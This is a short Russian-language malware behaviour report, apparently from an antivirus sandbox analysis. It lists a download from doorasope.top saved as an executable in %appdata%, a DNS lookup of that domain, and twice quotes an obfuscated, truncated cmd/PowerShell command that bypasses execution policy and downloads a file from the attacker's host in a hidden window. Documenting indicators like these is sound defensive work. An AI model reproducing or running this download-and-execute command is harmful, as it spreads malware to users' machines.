Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^oWErS^He^lL.Exe^ -eXe^cu^tionpol^icy b^YpasS -n^OpRoFIlE^ -WINd^oWSty^Le hI^d^D^eN (N^ew-oBjEc^T^ sYstE^m.nEt.weBcLIENt).D^OWN^L^OaDf^i^L^E(^'http://www.doorasope.top/read.ph...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "P^oWErS^He^lL.Exe^ -eXe^cu^tionpol^icy b^YpasS -n^OpRoFIlE^ -WINd^oWSty^Le hI^d^D^eN (N^ew-oBjEc^T^ sYstE^m.nEt.weBcLIENt).D^OWN^L^OaDf^i^L^E(^'http://www.doorasope.top/read.ph...' (со скрытым окном)